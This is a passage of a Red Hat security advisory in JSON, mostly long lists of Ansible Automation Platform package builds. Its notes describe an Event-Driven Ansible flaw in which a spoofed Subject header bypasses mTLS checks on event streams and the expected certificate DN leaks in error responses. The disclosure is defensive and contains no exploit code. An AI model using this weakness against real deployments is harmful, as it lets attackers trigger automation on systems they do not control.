"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2489127"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Event-Driven Ansible (EDA) server. The ExternalEventStreamViewSet uses permissive access controls (permission_classes=[AllowAny], authentication_classes=[]) and relies solely on the Subject HTTP header value for mTLS authentication without verifying that the header originated from a trusted proxy. Additionally, the expected certificate Distinguished Name is leaked in the 403 error response body. An attacker who can reach the EDA API endpoint with a spoofed Subject header can inject arbitrary events into mTLS-protected event streams, triggering downstream automation actions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "eda-server: ExternalEventStreamViewSet trusts Subject header without validation and leaks expected DN",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is a defense-in-depth failure in EDA that becomes exploitable when combined with the gateway header-forwarding issue (tracked as a separate CVE). EDA should not rely solely on an HTTP header for mTLS authentication. The DN leak in the error response further reduces the difficulty of exploitation. EDA has been included in AAP since version 2.4. The mTLS external event stream feature and the trust-of-Subject-header pattern apply to all EDA versions that support external event streams with mTLS authentication.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
